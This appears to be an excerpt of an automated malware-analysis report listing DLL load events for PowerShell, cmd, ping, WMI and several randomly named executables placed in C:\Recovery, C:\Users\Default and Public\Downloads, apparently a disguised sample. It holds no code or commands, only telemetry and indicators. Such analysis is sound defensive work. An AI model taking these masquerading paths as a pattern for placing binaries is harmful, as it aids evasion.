Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: apphelp.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: mscoree.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: version.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: wldp.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: profapi.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptsp.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: rsaenh.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptbase.dll
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: sspicli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ktmw32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: uxtheme.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: propsys.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: edputil.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: urlmon.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: iertutil.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: srvcli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: netutils.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wintypes.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: appresolver.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: bcp47langs.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: slc.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: userenv.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sppc.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mpr.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: pcacli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sfc_os.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ktmw32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wbemcomn.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: amsi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: userenv.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: iphlpapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dnsapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dhcpcsvc6.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dhcpcsvc.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: winnsi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rasapi32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rasman.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rtutils.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mswsock.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: winhttp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rasadhlp.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: fwpuclnt.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: uxtheme.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: winmm.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: winmmbase.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mmdevapi.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: devobj.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ksuser.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: avrt.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: audioses.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: powrprof.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: umpdc.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: msacm32.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: midimap.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: dwrite.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: edputil.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windowscodecs.dll
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ntmarta.dll
